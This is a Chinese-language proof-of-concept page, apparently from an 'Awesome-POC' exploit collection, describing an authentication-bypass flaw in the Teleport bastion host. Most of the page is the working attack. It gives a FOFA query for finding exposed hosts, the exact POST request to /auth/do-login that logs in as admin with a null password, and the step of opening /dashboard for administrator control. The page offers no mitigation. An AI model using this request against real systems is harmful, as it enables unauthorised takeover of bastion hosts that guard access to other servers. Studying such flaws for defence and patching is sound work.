Awesome-POC/网络设备漏洞/Teleport堡垒机 do-login 任意用户登录漏洞.md
2022-08-24 14:34:12 +08:00

37 lines
899 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Teleport堡垒机 do-login 任意用户登录漏洞
## 漏洞描述
Teleport堡垒机存在任意用户登录漏洞攻击者通过构造特殊的请求包可以登录堡垒机获取其他系统权限
## 漏洞影响
```
Teleport Version <= 20220817
```
## FOFA
```
app="TELEPORT堡垒机"
```
## 漏洞复现
登录页面
![image-20220824134958109](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241349427.png)
验证POC captcha参数为验证码
```
POST /auth/do-login
args={"type":2,"username":"admin","password":null,"captcha":"ykex","oath":"","remember":false}
```
![image-20220824135439227](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241354271.png)
code 返回 0 即为成功,再访问 /dashboard 获取管理员权限
![image-20220824135449199](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241354243.png)